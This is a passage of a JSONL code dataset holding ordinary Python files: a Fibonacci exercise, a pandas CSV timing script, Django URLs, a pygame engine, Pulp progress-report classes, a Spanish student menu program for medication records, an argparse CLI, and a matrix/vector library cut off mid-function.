num<=1:\r\n return num\r\n else:\r\n return (fibo(num-1) + fibo(num-2))\r\n \r\nn = int(input(\"Enter a number : \"))\r\n\r\nif n<=0:\r\n print(\"Please enter a positive number\")\r\nelse:\r\n print(\"Fibonacci sequence: \")\r\n for i in range(n):\r\n print(fibo(i))\r\n ","sub_path":"Python/Activities/Activities/Activity14.py","file_name":"Activity14.py","file_ext":"py","file_size_in_byte":305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"71602533","text":"\"\"\"\nIntroduced panda reader to limit the data we read in the csv to two columns.\n\"\"\"\n\nimport datetime\nimport csv\nimport time\nimport pandas\n\ndef analyze(filename):\n \"\"\"Count instances of each year and 'ao' in a csv file.\"\"\"\n\n start = time.time()\n\n data = pandas.read_csv(filename)\n# with open(filename) as csvfile:\n# reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n\n year_count = {\n \"2013\": 0,\n \"2014\": 0,\n \"2015\": 0,\n \"2016\": 0,\n \"2017\": 0,\n \"2018\": 0\n }\n\n ao_count = 0\n print(data.Date[0])\n \n for date in data.Date:\n year_count[date[-4:]] += 1\n\n for cell in data.a_o:\n if 'ao' in str(cell):\n ao_count += 1\n\n print(year_count)\n print(f\"'ao' was found {ao_count} times\")\n\n print(f'{time.time() - start} seconds')\n\n return (year_count, ao_count)\n\ndef main():\n filename = \"data/exercise.csv\"\n analyze(filename)\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"students/steve_walker/lesson06/assignment/archived_trials/time_trial_5.py","file_name":"time_trial_5.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"418887236","text":"from django.urls import path\nfrom . import views\napp_name = 'Courses'\n\nurlpatterns=[\n path('category_list/' , views.category_list , name = 'category_list'),\n path('programming_list/' , views.programming_list , name = 'programming_list'),\n path('design_list/' , views.design_list , name = 'design_list'),\n path('development_list/' , views.development_list , name = 'development_list'),\n path('lang_list/' , views.lang_list , name = 'lang_list'),\n path('network_list/' , views.network_list , name = 'network_list'),\n path('secuirty_list/' , views.secuirty_list , name = 'secuirty_list'),\n path('system_list/' , views.system_list , name = 'system_list'),\n path('database_list/' , views.database_list , name = 'database_list'),\n\n path('rate//' , views.rate , name = 'rate'), \n path ('course_details//detail', views.course_detail, name = 'course_details'),\n path ('course_contante//contante', views.course_contante, name = 'course_contante'),\n path ('course_contante//register', views.enroll_courses, name = 'course_enroll'),\n path ('video_content//', views.video_content, name = 'video_content'),\n \n \n]","sub_path":"Courses/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1155,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"100731146","text":"import pygame\nfrom pygame.locals import *\n\nfrom constants import *\n\nclass Engine (object):\n def __init__(self, resolution, fullscreen=False):\n pygame.init()\n flag = 0\n if fullscreen:\n flag = pygame.FULLSCREEN\n self.display = pygame.display.set_mode(resolution, flag)\n self.bg_img = pygame.Surface(resolution)\n self.bg_img.fill(COL_BG)\n self.clock = pygame.time.Clock()\n self.is_runnning = True\n self.sprites = pygame.sprite.LayeredDirty()\n\n def run(self):\n while self.is_runnning:\n self._handle_events()\n self._update()\n self._render()\n\n def _handle_events(self):\n for event in pygame.event.get():\n if event.type == QUIT:\n self.is_runnning = False\n elif event.type == KEYDOWN:\n if event.key == K_ESCAPE:\n self.is_runnning = False\n elif event.type == MOUSEBUTTONDOWN:\n for sprite in self.sprites:\n sprite.on_mouse_down(event)\n\n def _update(self):\n dt = self.clock.tick(30)\n self.sprites.update(dt)\n \n\n def _render(self):\n self.sprites.clear(self.display, self.bg_img)\n dirty_rects = self.sprites.draw(self.display)\n pygame.display.update(dirty_rects)\n\n\n","sub_path":"src/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"188934308","text":"# -*- coding: utf-8 -*-\n#\n# Copyright © 2013 Red Hat, Inc.\n#\n# This software is licensed to you under the GNU General Public\n# License as published by the Free Software Foundation; either version\n# 2 of the License (GPLv2) or (at your option) any later version.\n# There is NO WARRANTY for this software, express or implied,\n# including the implied warranties of MERCHANTABILITY,\n# NON-INFRINGEMENT, or FITNESS FOR A PARTICULAR PURPOSE. You should\n# have received a copy of GPLv2 along with this software; if not, see\n# http://www.gnu.org/licenses/old-licenses/gpl-2.0.txt.\n\"\"\"\nContains classes and functions related to tracking the progress of the ISO\nimporter and distributor.\n\"\"\"\nfrom datetime import datetime\n\nfrom pulp_rpm.common import reporting\nfrom pulp_rpm.common.constants import STATE_COMPLETE, STATE_FAILED, STATE_NOT_STARTED, STATE_RUNNING\n\n\nclass ISOProgressReport(object):\n def __init__(self, conduit):\n self.conduit = conduit\n\n # These variables track the state of the ISO download stage\n self._isos_state = STATE_NOT_STARTED\n self.isos_execution_time = None\n self.isos_total_count = None\n self.isos_finished_count = 0\n self.isos_error_count = 0\n # mapping of iso to its error\n self.isos_individual_errors = {}\n # overall execution error\n self.isos_error_message = None\n self.isos_exception = None\n self.isos_traceback = None\n\n # Manifest download and generation\n self._manifest_state = STATE_NOT_STARTED\n self.manifest_execution_time = None\n self.manifest_error_message = None\n self.manifest_exception = None\n self.manifest_traceback = None\n\n def add_failed_iso(self, iso, error_report):\n \"\"\"\n Updates the progress report that a iso failed to be imported.\n \"\"\"\n self.isos_error_count += 1\n self.isos_individual_errors[iso['name']] = {\n 'error_report': error_report,\n }\n\n def build_progress_report(self):\n \"\"\"\n Returns the actual report that should be sent to Pulp as the current\n progress of the sync.\n\n :return: description of the current state of the sync\n :rtype: dict\n \"\"\"\n\n report = {\n 'manifest': self._generate_manifest_section(),\n 'isos': self._generate_isos_section(),\n }\n return report\n\n @classmethod\n def from_progress_dict(cls, report):\n \"\"\"\n Parses the output from the build_progress_report method into an instance\n of this class. The intention is to use this client-side to reconstruct\n the instance as it is retrieved from the server.\n\n The build_final_report call on instances returned from this call will\n not function as it requires the server-side conduit to be provided.\n Additionally, any exceptions and tracebacks will be a text representation\n instead of formal objects.\n\n :param report: progress report retrieved from the server's task\n :type report: dict\n :return: instance populated with the state in the report\n :rtype: SyncProgressReport\n \"\"\"\n\n r = cls(None)\n\n m = report['manifest']\n r.manifest_state = m['state']\n r.manifest_execution_time = m['execution_time']\n r.manifest_error_message = m['error_message']\n r.manifest_exception = m['error']\n r.manifest_traceback = m['traceback']\n\n m = report['isos']\n r.isos_state = m['state']\n r.isos_execution_time = m['execution_time']\n r.isos_total_count = m['total_count']\n r.isos_finished_count = m['finished_count']\n r.isos_error_count = m['error_count']\n r.isos_individual_errors = m['individual_errors']\n r.isos_error_message = m['error_message']\n r.isos_exception = m['error']\n r.isos_traceback = m['traceback']\n\n return r\n\n def _get_isos_state(self):\n return self._isos_state\n\n def _set_isos_state(self, new_state):\n self._set_timed_state('_isos_state', '_isos_start_time', 'isos_execution_time', new_state)\n\n isos_state = property(_get_isos_state, _set_isos_state)\n\n def _get_manifest_state(self):\n return self._manifest_state\n\n def _set_manifest_state(self, new_state):\n self._set_timed_state('_manifest_state', '_manifest_start_time', 'manifest_execution_time', new_state)\n\n manifest_state = property(_get_manifest_state, _set_manifest_state)\n\n def update_progress(self):\n \"\"\"\n Sends the current state of the progress report to Pulp.\n \"\"\"\n report = self.build_progress_report()\n self.conduit.set_progress(report)\n\n def _generate_isos_section(self):\n isos_report = {\n 'state': self.isos_state,\n 'execution_time': self.isos_execution_time,\n 'total_count': self.isos_total_count,\n 'finished_count': self.isos_finished_count,\n 'error_count': self.isos_error_count,\n 'individual_errors': self.isos_individual_errors,\n 'error_message': self.isos_error_message,\n 'error': reporting.format_exception(self.isos_exception),\n 'traceback': reporting.format_traceback(self.isos_traceback),\n }\n return isos_report\n\n def _generate_manifest_section(self):\n manifest_report = {\n 'state': self.manifest_state,\n 'execution_time': self.manifest_execution_time,\n 'error_message': self.manifest_error_message,\n 'error': reporting.format_exception(self.manifest_exception),\n 'traceback': reporting.format_traceback(self.manifest_traceback),\n }\n return manifest_report\n\n def _set_timed_state(self, state_attribute_name, start_time_attribute_name, execution_time_attribute_name,\n new_state):\n \"\"\"\n For the manifest_state and isos_state attributes, we have special setter properties that also time\n how long it takes them to move from a running state to a complete or failed state. This method is used\n by both of those properties to keep track of how long the state transition takes, and it also sets the\n appropriate state on the progress report.\n\n :param state_attribute_name: The name of the attribute on self where the new state should be\n stored\n :type state_attribute_name: basestring\n :param start_time_attribute_name: The name of an attribute on self that should be used to store\n the time when the attribute entered a running state.\n :type start_time_attribute_name: basestring\n :param execution_time_attribute_name: The name of an attribute on self that should be used to store\n the calculated execution time.\n :type execution_time_attribute_name: basestring\n :param new_state: The new state that should be set onto self.state_attribute_name\n :type new_state: basestring\n \"\"\"\n current_state = getattr(self, state_attribute_name)\n if current_state == STATE_NOT_STARTED and new_state == STATE_RUNNING:\n setattr(self, start_time_attribute_name, datetime.utcnow())\n\n if current_state == STATE_RUNNING and new_state in [STATE_COMPLETE, STATE_FAILED]:\n execution_time = datetime.utcnow() - getattr(self, start_time_attribute_name)\n execution_time = (execution_time.days * 3600 * 24) + \\\n execution_time.seconds\n setattr(self, execution_time_attribute_name, execution_time)\n\n setattr(self, state_attribute_name, new_state)\n\n\nclass PublishProgressReport(ISOProgressReport):\n \"\"\"\n Used to carry the state of the publish run as it proceeds. This object is used\n to update the on going progress in Pulp at appropriate intervals through\n the update_progress call. Once the publish is finished, this object should\n be used to produce the final report to return to Pulp to describe the\n result of the operation.\n \"\"\"\n def __init__(self, conduit):\n super(self.__class__, self).__init__(conduit)\n\n # Publishing state\n self.publish_http = STATE_NOT_STARTED\n self.publish_https = STATE_NOT_STARTED\n\n def build_final_report(self):\n \"\"\"\n Assembles the final report to return to Pulp at the end of the run.\n\n :return: report to return to Pulp at the end of the publish call\n :rtype: pulp.plugins.model.PublishReport\n \"\"\"\n\n # Report fields\n total_execution_time = -1\n if self.manifest_execution_time is not None and self.isos_execution_time is not None:\n total_execution_time = self.manifest_execution_time + self.isos_execution_time\n\n summary = {\n 'total_execution_time': total_execution_time\n }\n\n # intentionally empty; not sure what to put in here\n details = {}\n\n # Determine if the report was successful or failed\n all_step_states = (self.manifest_state, self.isos_state, self.publish_http,\n self.publish_https)\n unsuccessful_steps = [s for s in all_step_states if s != STATE_COMPLETE]\n\n if len(unsuccessful_steps) == 0:\n report = self.conduit.build_success_report(summary, details)\n else:\n report = self.conduit.build_failure_report(summary, details)\n\n return report\n\n def build_progress_report(self):\n \"\"\"\n Returns the actual report that should be sent to Pulp as the current\n progress of the publish.\n\n :return: description of the current state of the publish\n :rtype: dict\n \"\"\"\n report = super(self.__class__, self).build_progress_report()\n report['publishing'] = self._generate_publishing_section()\n return report\n\n @classmethod\n def from_progress_dict(cls, report):\n \"\"\"\n Parses the output from the build_progress_report method into an instance\n of this class. The intention is to use this client-side to reconstruct\n the instance as it is retrieved from the server.\n\n The build_final_report call on instances returned from this call will\n not function as it requires the server-side conduit to be provided.\n Additionally, any exceptions and tracebacks will be a text representation\n instead of formal objects.\n\n :param report: progress report retrieved from the server's task\n :type report: dict\n :return: instance populated with the state in the report\n :rtype: PublishProgressReport\n \"\"\"\n r = super(cls).from_progress_dict(report)\n\n m = report['publishing']\n r.publish_http = m['http']\n r.publish_https = m['https']\n\n return r\n\n def _generate_publishing_section(self):\n publishing_report = {\n 'http': self.publish_http,\n 'https': self.publish_https,\n }\n return publishing_report\n\n\nclass SyncProgressReport(ISOProgressReport):\n \"\"\"\n Used to carry the state of the sync run as it proceeds. This object is used\n to update the on going progress in Pulp at appropriate intervals through\n the update_progress call. Once the sync is finished, this object should\n be used to produce the final report to return to Pulp to describe the\n sync.\n \"\"\"\n def __init__(self, conduit):\n super(self.__class__, self).__init__(conduit)\n\n # Let's also track how many bytes we've got on the ISOs\n self.isos_total_bytes = None\n self.isos_finished_bytes = 0\n\n def build_final_report(self):\n \"\"\"\n Assembles the final report to return to Pulp at the end of the sync.\n The conduit will include information that it has tracked over the\n course of its usage, therefore this call should only be invoked\n when it is time to return the report.\n \"\"\"\n if self.isos_error_count != 0:\n self.isos_state = STATE_FAILED\n\n # Report fields\n total_execution_time = -1\n if self.manifest_execution_time is not None and self.isos_execution_time is not None:\n total_execution_time = self.manifest_execution_time + self.isos_execution_time\n\n summary = {\n 'total_execution_time': total_execution_time\n }\n\n details = {\n 'total_count': self.isos_total_count,\n 'finished_count': self.isos_finished_count,\n 'error_count': self.isos_error_count,\n }\n\n # Determine if the report was successful or failed\n all_step_states = (self.manifest_state, self.isos_state)\n unsuccessful_steps = [s for s in all_step_states if s != STATE_COMPLETE]\n\n if len(unsuccessful_steps) == 0:\n report = self.conduit.build_success_report(summary, details)\n else:\n report = self.conduit.build_failure_report(summary, details)\n\n return report\n\n def _generate_isos_section(self):\n isos_report = super(self.__class__, self)._generate_isos_section()\n isos_report['total_bytes'] = self.isos_total_bytes\n isos_report['finished_bytes'] = self.isos_finished_bytes\n return isos_report","sub_path":"pulp_rpm/src/pulp_rpm/common/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":13404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"152904984","text":"import random, os, pickle\nfrom registros import *\n\n\ndef carga(v, n):\n medicamentos = (\"COBRÉ1.\", \"PLOMO1234.\", \"zinc4.\", \"ÉSTAÑO5.\", \"HIERRO51.\", \"manganeso5\", \"1m2olibdeno5\", \"cobalto\",\n \"Posible VACUNA1 contra el maldito COVID-19.\", \"titan4567io\", \"cromo\", \"oro\", \"plata\", \"platino\", \"plutonio\", \"uranio\", \"radio\",\n \"torio\", \"mairene\", \"potasio \", \"yodo \", \"carbonato \", \"cloruro\", \"sulfato\",\n \"dolomita\")\n directores = (\"Bruno\", \"Mariel\", \"Bianca\", \"Juan Cruz\", \"Jorge\", \"Antonela\", \"Josefina\", \"Lea\",\n \"Aylen\", \"Exequiel\", \"Lilith\", \"Lou\", \"Luz\", \"Lautaro\", \"Tomas\", \"Azul\", \"Cecilia\",\n \"Agustin\", \"Mairene\", \"Angelo\", \"Angela\", \"Celeste\", \"Karen\", \"Ludmila\", \"Francisca\")\n idstr = (\"A\", \"B\", \"C\", \"D\", \"E\")\n for i in range(n):\n id = str(random.randint(1, 10)) + random.choice(idstr)\n descripcion = random.choice(medicamentos)\n director = random.choice(directores)\n monto = random.randint(100, 100000)\n tipo = random.randint(1, 30)\n avales = random.randint(0, 9)\n new = Medicamento(id, descripcion, director, monto, tipo, avales)\n add_in_order(v, new)\n return v\n\n\n# Ordenamientos agregado\ndef add_in_order(v, nuevo):\n n = len(v)\n pos = n\n izq, der = 0, n - 1\n while izq <= der:\n c = (izq + der) // 2\n if v[c].id == nuevo.id:\n pos = c\n break\n if nuevo.id < v[c].id:\n der = c - 1\n else:\n izq = c + 1\n if izq > der:\n pos = izq\n v[pos:pos] = [nuevo]\n\n\ndef mostrar(v):\n n = len(v)\n for i in range(n):\n to_string(v[i])\n\n\ndef menu():\n print(\"1-Carga de datos\")\n print(\"2-Mostrar arreglo a razon de una linea\")\n print(\"3-Buscar en el arreglo un director\")\n print(\"4-Buscar clave por id K\")\n print(\"5-Matriz acumulacion\")\n print(\"6-Generar archivo\")\n print(\"7-Mostrar archivo\")\n print(\"8-Analizar cadena\")\n print(\"9-Salir\")\n sep()\n op = validar_rango(1, 9, \"Ingrese opcion del menu: \")\n return op\n\n\ndef sep():\n print(\"=\" * 30)\n\n\n# Validaciones\ndef validar_monto(mensaje):\n monto = float(input(mensaje))\n while monto < 0:\n print('Inválido! Debe ser un valor positivo.')\n monto = float(input(mensaje))\n return monto\n\n\ndef validar_pos(a):\n n = a\n while n <= a:\n n = int(input(\"Ingrese valor n a cargar en el arreglo(mayor a \" + str(a) + \"):\"))\n if n <= a:\n print(\"Error ingrese un valor mayor a:\", a)\n return n\n\n\ndef validar_rango(inf, sup, mensaje):\n n = inf - 1\n while inf > n or n > sup:\n n = int(input(mensaje))\n if n < inf or n > sup:\n print(\"Error... opcion invalida, ingrese entre \" + str(inf) + \" y \" + str(sup))\n return n\n\n\ndef busqueda_secuencial(v, nom):\n for i in range(len(v)):\n if v[i].director == nom:\n return i\n return -1\n\n\ndef binary_search(v, x):\n izq, der = 0, len(v) - 1\n while izq <= der:\n c = (izq + der) // 2\n if x == v[c].id:\n return c\n if x < v[c].id:\n der = c - 1\n else:\n izq = c + 1\n return -1\n\n\ndef crear_matriz(v):\n conteo = [[0] * 30 for i in range(10)]\n for i in v:\n c = i.tipo\n f = i.avales\n conteo[f][c] += i.monto\n return conteo\n\n\ndef mostrar_matriz(conteo, v, m):\n print()\n for i in range(len(conteo)):\n for j in range(len(conteo[i])):\n if conteo[i][j] != 0:\n print(\"El monto acumulado con tipo \", i, \" y avales \", j, \" es: $\", conteo[i][j])\n\n\n# Manipulacion de archivos\ndef crear_archivo(v, fd):\n m = open(fd, \"wb\")\n n = len(v)\n for i in range(n):\n if v[i].descripcion >= 25 and v[i].tipo != 15 and v[i].tipo != 10:\n pickle.dump(v[i], m)\n print(\"Archivo generado!\")\n m.close()\n\n\ndef mostrar_archivo(fd):\n if not os.path.exists(fd):\n print(\"El archivo no existe, generelo con el punto anterior\")\n return\n\n m = open(fd, \"rb\")\n tamano = os.path.getsize(fd)\n\n print(\"Datos del archivo: \")\n while m.tell() < tamano:\n a = pickle.load(m)\n if a.monto > 100000:\n to_string(a)\n m.close()\n\n\ndef extra(cadena):\n if len(cadena) <= 0:\n print(\"Primero debe generar la cadena en el punto 3\")\n return\n\n letras = \"abcdefghijkmñlopqrstuvwxyzaeiouáéíóú\"\n mayus = letras.upper()\n rango = len(cadena)\n cumple_condicion = 0\n hay_min = hay_mayus = False\n hay_digito = 0\n for i in cadena:\n print(i)\n if i != \" \" and i != \".\":\n if i in letras:\n hay_min = True\n print(\"mins\", hay_min)\n if i in mayus:\n hay_mayus = True\n print(\"mayus\", hay_mayus)\n if i.isdigit():\n hay_digito += 1\n print(\"digito\", hay_digito)\n else:\n if (hay_min == False) and (hay_mayus == True) and (hay_digito >= 1):\n cumple_condicion += 1\n print(\"entra\")\n\n hay_min = hay_mayus = False\n hay_digito = 0\n print(\"La cantidad de palabras que cumple de la cadena es: \", cumple_condicion)\n\ndef principal():\n v = []\n fd = \"vector.dat\"\n op = -1\n cadena = \"\"\n while op != 9:\n op = menu()\n if op == 1:\n n = int(input(\"Ingrese cantidad de medicamentos a cargar: \"))\n v = carga(v, n)\n print(\"Vector cargado con exito!\")\n sep()\n elif op == 2:\n if len(v) != 0:\n mostrar(v)\n else:\n print(\"Debe cargar los datos primero(opcion1)\")\n sep()\n elif op == 3:\n if len(v) != 0:\n nom = input(\"Ingrese el directo: \")\n res = busqueda_secuencial(v, nom)\n if res != -1:\n print(v[res].descripcion)\n cadena = v[res].descripcion\n else:\n print(\"No existe dicho director...\")\n else:\n print(\"Debe cargar los datos primero(opcion1)\")\n sep()\n elif op == 4:\n if len(v) != 0:\n k = input(\"Ingrese el directo: \")\n res = binary_search(v, k)\n if res != -1:\n to_string(v[res])\n else:\n print(\"No existe dicho id...\")\n else:\n print(\"Debe cargar los datos primero(opcion1)\")\n sep()\n elif op == 5:\n if len(v) != 0:\n matriz = crear_matriz(v)\n print(\"Matriz creada con exito!\")\n m = int(input(\"Ingrese valor a filtrar: \"))\n mostrar_matriz(matriz, v, m)\n else:\n print(\"Debe cargar los datos primero(opcion1)\")\n sep()\n elif op == 6:\n crear_archivo(v, fd)\n sep()\n elif op == 7:\n mostrar_archivo(fd)\n sep()\n elif op == 8:\n extra(cadena)\n sep()\n elif op == 9:\n print(\"Gracias por utilizar el programa!\")\n sep()\n\n\n# Script princial...\nif __name__ == '__main__':\n principal()\n","sub_path":"Practica Final/medico/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7305,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"35951558","text":"\"\"\"\nModule for command line interface implementation.\n\"\"\"\n\nimport abc\nimport argparse\nimport sys\n\nfrom example import __version__\nfrom example.io import print_hello_world\n\n\nclass SubCommand(abc.ABC):\n \"\"\"\n Abstract base class for sub commands.\n\n A new sub command can be added by calling the init_subparser().\n \"\"\"\n\n @classmethod\n @abc.abstractmethod\n def _name(cls):\n \"\"\"\n Return name of the command.\n\n :return: Command name\n :rtype: str\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def _help(cls):\n \"\"\"\n Return help description.\n\n :return: Help description\n :rtype: str\n \"\"\"\n return cls.__doc__\n\n @classmethod\n @abc.abstractmethod\n def _add_arguments(cls, parser):\n \"\"\"\n Initialize the argument parser and help for the specific sub-command.\n\n Must be implemented by a sub-command.\n\n :param parser: A parser.\n :type parser: argparse.ArgumentParser\n :return: void\n \"\"\"\n raise NotImplementedError()\n\n @classmethod\n def init_subparser(cls, subparsers):\n \"\"\"\n Initialize the argument parser and help for the specific sub-command.\n\n :param subparsers: A subparser.\n :type subparsers: argparse.ArgumentParser\n :return: void\n \"\"\"\n parser = subparsers.add_parser(cls._name(), help=cls._help())\n cls._add_arguments(parser)\n parser.set_defaults(func=cls.execute)\n\n @classmethod\n @abc.abstractmethod\n def execute(cls, args):\n \"\"\"\n Execute the command.\n\n Must be implemented by a sub-command.\n\n :param args: argparse arguments.\n :return: 0 on success.\n \"\"\"\n raise NotImplementedError()\n\n\nclass HelloCmd(SubCommand):\n \"\"\"Prints a welcome message.\"\"\"\n\n @classmethod\n def _name(cls):\n return 'hello'\n\n @classmethod\n def _add_arguments(cls, parser):\n parser.add_argument('name', help='Name to greet.')\n return parser\n\n @classmethod\n def execute(cls, args):\n \"\"\"Execute the command.\"\"\"\n print_hello_world(args.name)\n\n return 0\n\n\ndef main(argv=None):\n \"\"\"\n Start the Example tool.\n\n :return: 0 on success.\n \"\"\"\n if not argv:\n argv = sys.argv\n\n # Parse arguments\n parser = argparse.ArgumentParser(prog=argv[0])\n parser.add_argument('--version', action='version', version='%(prog)s ' + __version__)\n\n subparser = parser.add_subparsers(title='Example Commands', description='Valid example commands.')\n HelloCmd.init_subparser(subparser)\n\n args = parser.parse_args(argv[1:])\n try:\n # Check if a sub-command is given, otherwise print help.\n getattr(args, 'func')\n except AttributeError:\n parser.print_help()\n return 2\n\n return args.func(args)\n\n\nif __name__ == '__main__':\n sys.exit(main())\n","sub_path":"python_distutils/example/cmdline.py","file_name":"cmdline.py","file_ext":"py","file_size_in_byte":2919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"440452292","text":"# coding:utf-8\n#!/usr/bin/python\n\nfrom math import *\n\n#--------------------------\n# Frame class\n#--------------------------\n\nclass FRAME() :\n def __init__(self, frm = [], mat = [], vec = [], xyzabc = []) :\n if frm :\n self.mat = MATRIX(mat = frm.mat)\n self.vec = VECTOR(vec = frm.vec)\n elif xyzabc :\n self.vec = VECTOR(xyzabc[0], xyzabc[1], xyzabc[2])\n self.mat = MATRIX(a = xyzabc[3], b = xyzabc[4], c = xyzabc[5])\n else :\n self.mat = MATRIX(mat = mat)\n self.vec = VECTOR(vec = vec)\n\n def __mul__(self, other) :\n tmp = None\n\n if isinstance(other, FRAME) :\n tmp_mat = self.mat * other.mat\n tmp_vec = (self.mat * other.vec) + self.vec\n tmp = FRAME(mat = tmp_mat, vec = tmp_vec)\n elif isinstance(other, VECTOR) :\n tmp = (self.mat * other) + self.vec\n\n return(tmp)\n\n def __neg__(self) :\n tmp = FRAME()\n tmp.mat = -self.mat\n tmp.vec = (-self.mat) * (-self.vec)\n return(tmp)\n\n def xyzabc(self) :\n tmp = []\n\n for i in range(0, 3) :\n tmp.append(self.vec[i])\n\n for i in range(0, 3) :\n tmp.append(self.mat.abc()[i])\n\n return(tmp)\n\n def __repr__(self) :\n return(\"f:(\" + repr(self.mat) + \",\" + repr(self.vec) + \")\")\n\n#--------------------------\n# Matrix class\n#--------------------------\n\nclass MATRIX(list):\n # コンストラクタ\n def __init__(self, mat=[], a=0.0, b=0.0, c=0.0, angle=0.0, axis=[]) :\n list.__init__(self)\n self.append([1.0, 0.0, 0.0])\n self.append([0.0, 1.0, 0.0])\n self.append([0.0, 0.0, 1.0])\n\n if mat:\n for i in range(0, 3):\n for j in range(0, 3):\n self[i][j] = mat[i][j]\n elif a != 0.0 or b != 0.0 or c != 0.0 :\n if a != 0.0 :\n si_a = sin(a)\n co_a = cos(a)\n else :\n si_a = 0.0\n co_a = 1.0\n\n if b != 0.0 :\n si_b = sin(b)\n co_b = cos(b)\n else :\n si_b = 0.0\n co_b = 1.0\n\n if c != 0.0 :\n si_c = sin(c)\n co_c = cos(c)\n else :\n si_c = 0.0\n co_c = 1.0\n\n self[0][0] = co_b * co_c\n self[0][1] = -1.0 * co_b * si_c\n self[0][2] = si_b\n\n self[1][0] = si_a * si_b * co_c + co_a * si_c\n self[1][1] = -1.0 * si_a * si_b * si_c + co_a * co_c\n self[1][2] = -1.0 * si_a * co_b\n\n self[2][0] = -1.0 * co_a * si_b * co_c + si_a * si_c\n self[2][1] = co_a * si_b * si_c + si_a * co_c\n self[2][2] = co_a * co_b\n\n elif axis :\n # rotate around any axis\n len = axis.abs()\n if len != 0.0 and angle != 0.0:\n co = cos(angle)\n si = sin(angle)\n atmp = axis.normal()\n self[0][0] = atmp[0]*atmp[0]*(1.0 - co) + co\n self[1][0] = atmp[1]*atmp[0]*(1.0 - co) + atmp[2]*si\n self[2][0] = atmp[2]*atmp[0]*(1.0 - co) - atmp[1]*si\n self[0][1] = atmp[0]*atmp[1]*(1.0 - co) - atmp[2]*si\n self[1][1] = atmp[1]*atmp[1]*(1.0 - co) + co\n self[2][1] = atmp[2]*atmp[1]*(1.0 - co) + atmp[0]*si\n self[0][2] = atmp[0]*atmp[2]*(1.0 - co) + atmp[1]*si\n self[1][2] = atmp[1]*atmp[2]*(1.0 - co) - atmp[0]*si\n self[2][2] = atmp[2]*atmp[2]*(1.0 - co) + co\n\n def __repr__(self):\n return(\"m:\" + list.__repr__(self))\n\n def col(self, idx, arg=[]) :\n tmp = VECTOR()\n if arg :\n for i in [0,1,2] :\n self[i][idx] = arg[i]\n for i in [0,1,2] :\n tmp[i] = self[i][idx]\n else :\n for i in range(0, 3) :\n tmp[i] = self[i][idx]\n\n return(tmp)\n\n def row(self, idx, arg=[]) :\n tmp = VECTOR()\n if arg :\n for i in [0,1,2] :\n self[idx][i] = arg[i]\n for i in [0,1,2] :\n tmp[i] = self[idx][i]\n else :\n for i in range(0, 3) :\n tmp[i] = self[idx][i]\n\n return(tmp)\n\n def rot_axis(self) :\n axis = VECTOR()\n co=(self[0][0]+self[1][1]+self[2][2]-1.0)/2.0;\n if co <= -1.0 :\n angl = pi;\n tmp=min(1.0,max(0,(self[0][0] + 1.0)/2.0))\n axis[0] = sqrt(tmp)\n tmp=min(1.0,max(0,(self[1][1] + 1.0)/2.0))\n axis[1] = sign(self[0][1])*sqrt(tmp)\n tmp=min(1.0,max(0,(self[2][2] + 1.0)/2.0))\n axis[2] = sign(self[0][2])*sqrt(tmp)\n si=0.0\n elif co < 1.0 :\n axis[0] = self[2][1] - self[1][2]\n axis[1] = self[0][2] - self[2][0]\n axis[2] = self[1][0] - self[0][1]\n an = abs(axis)\n if(an != 0.0) :\n for i in [0,1,2] :\n axis[i] = axis[i]/an\n si = an/2.0\n angl = arctan2(si,co);\n else :\n angl = 0.0\n axis[0] = 1.0\n axis[1] = 0.0\n axis[2] = 0.0\n else :\n angl = 0.0\n axis[0] = 1.0\n axis[1] = 0.0\n axis[2] = 0.0\n return([angl,axis])\n\n def abc(self) :\n if self[0][2] >= 1.0 :\n b = pi/2;\n a = 0.0;\n c = atan2(self[2][1],self[1][1])\n elif self[0][2] <= -1.0 :\n b = -pi/2;\n a = 0.0;\n c = atan2(self[1][0],self[2][0])\n else :\n b = asin(self[0][2]);\n a = atan2(-1.0 * self[1][2],self[2][2])\n c = atan2(-1.0 * self[0][1],self[0][0])\n return([a, b, c])\n\n def trans(self) :\n tmp = MATRIX()\n for i in range(0, 3) :\n for j in range(0, 3) :\n tmp[i][j] = self[j][i]\n return(tmp)\n\n def __neg__(self) :\n return(self.trans())\n\n def __mul__(self, other) :\n tmp = None\n\n if isinstance(other, MATRIX) :\n # 行列*行列\n tmp = MATRIX()\n for i in range(0, 3) :\n for j in range(0, 3) :\n tmp[i][j] = 0\n for k in range(0, 3) :\n tmp[i][j] += self[i][k] * other[k][j]\n elif isinstance(other, VECTOR) :\n # 行列*ベクトル\n tmp = VECTOR()\n for i in range(0, 3) :\n tmp[i] = 0\n for j in range(0, 3) :\n tmp[i] += self[i][j] * other[j]\n\n return(tmp)\n\n#--------------------------\n# Vector Class\n#--------------------------\n\nclass VECTOR(list):\n # コンストラクタ\n def __init__(self, x = 0.0, y = 0.0, z = 0.0, vec = []):\n list.__init__(self)\n self.append(x)\n self.append(y)\n self.append(z)\n\n if vec :\n for i in range(0, 3) :\n self[i] = vec[i]\n\n # 足し算\n def __add__(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = self[i] + other[i]\n\n return ans\n\n # 引き算\n def __sub__(self, other):\n # 例外処理\n if not isinstance(other, VECTOR):\n raise TypeError\n\n ans = VECTOR()\n for i in range(0, 3) :\n ans[i] = self[i] - other[i]\n\n ans.x = self.x - other.x\n ans.y = self.y - other.y\n ans.z = self.z - other.z\n return ans\n\n # 符号反転\n def __neg__(self):\n ans = VECTOR()\n for i in range(0, 3) :\n 